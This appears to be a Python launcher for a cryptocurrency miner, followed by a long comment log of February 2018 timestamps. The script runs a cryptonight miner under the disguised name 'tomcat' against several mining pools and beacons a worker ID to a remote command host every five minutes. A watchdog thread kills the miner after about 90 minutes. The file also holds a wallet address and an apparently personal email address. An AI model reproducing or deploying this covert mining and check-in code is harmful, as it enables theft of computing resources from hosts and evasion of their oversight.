import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:06.985998
#2018-02-17 16:06:04.144824
#2018-02-17 17:55:07.056926
#2018-02-17 19:43:01.275366
#2018-02-17 21:30:01.618510
#2018-02-17 23:15:07.591848
#2018-02-18 01:02:02.231889
#2018-02-18 02:50:03.782570
#2018-02-18 04:40:02.872915
#2018-02-18 06:32:04.441850
#2018-02-18 08:20:03.578970
#2018-02-18 10:08:07.326819
#2018-02-18 11:54:06.229379
#2018-02-18 13:39:07.339479
#2018-02-18 15:29:05.906841
#2018-02-18 17:18:01.648580
#2018-02-18 19:07:04.543008
#2018-02-18 20:53:04.469121
#2018-02-18 22:41:05.426931
#2018-02-19 00:30:08.236747
#2018-02-19 02:15:07.335072
#2018-02-19 04:05:06.346893
#2018-02-19 05:49:05.163140
#2018-02-19 07:38:04.985932
#2018-02-19 09:27:06.580597
#2018-02-19 11:16:06.135344
#2018-02-19 13:03:04.158328
#2018-02-19 14:49:09.756165
#2018-02-19 16:38:07.579574
#2018-02-19 18:25:01.992696
#2018-02-19 20:12:03.951286
#2018-02-19 22:01:06.701277
#2018-02-19 23:46:04.939310
#2018-02-20 01:33:06.705016
#2018-02-20 03:21:06.946103
#2018-02-20 05:09:04.558844
#2018-02-20 06:52:03.864328
#2018-02-20 08:38:06.848792
#2018-02-20 10:22:03.928935
#2018-02-20 12:06:04.360441
#2018-02-20 13:52:13.302170
#2018-02-20 15:32:04.291569
#2018-02-20 17:17:06.399434
#2018-02-20 19:07:04.494676
#2018-02-20 20:57:05.031959
#2018-02-20 22:43:01.374846
#2018-02-21 00:25:04.142120
#2018-02-21 02:11:07.682034
#2018-02-21 03:57:06.162706
#2018-02-21 05:44:08.090452
#2018-02-21 07:33:07.315057
#2018-02-21 09:17:07.529194
#2018-02-21 11:06:06.994970
#2018-02-21 12:54:08.579150
#2018-02-21 14:42:02.022698
#2018-02-21 16:29:08.869657
#2018-02-21 18:20:07.363921
#2018-02-21 20:05:01.668218
#2018-02-21 21:52:07.732293
#2018-02-21 23:39:01.311236
#2018-02-22 01:27:07.621111
#2018-02-22 03:16:04.467020
#2018-02-22 05:02:04.736170
#2018-02-22 06:44:07.157542
#2018-02-22 08:33:08.008389
#2018-02-22 10:20:08.702422
#2018-02-22 12:04:09.795939
#2018-02-22 13:50:08.066083
#2018-02-22 15:39:04.628993
#2018-02-22 17:25:02.399236
#2018-02-22 19:12:11.369495
#2018-02-22 21:04:08.048163
#2018-02-22 22:50:02.155394
#2018-02-23 00:36:08.986979
#2018-02-23 02:21:07.012065
#2018-02-23 04:09:06.466343
#2018-02-23 05:55:06.707016
#2018-02-23 07:36:05.398504
#2018-02-23 09:39:05.641291
#2018-02-23 11:43:07.032964
#2018-02-23 13:33:05.860746
#2018-02-23 15:18:05.444431
#2018-02-23 17:05:10.413980
#2018-02-23 18:53:08.261657
#2018-02-23 20:40:01.519658
#2018-02-23 22:27:06.876270
#2018-02-24 00:12:01.660751
#2018-02-24 02:04:05.308714
#2018-02-24 03:55:05.547328
#2018-02-24 05:40:07.777941
#2018-02-24 07:29:04.379445
#2018-02-24 09:16:04.211306
#2018-02-24 11:12:05.438892
#2018-02-24 13:01:05.138155
#2018-02-24 14:48:05.473321
#2018-02-24 16:40:07.643984
#2018-02-24 18:29:03.950084
#2018-02-24 20:16:06.967363
#2018-02-24 22:07:07.703982
#2018-02-25 01:05:04.489505
#2018-02-25 04:46:07.039073
#2018-02-25 09:02:01.587186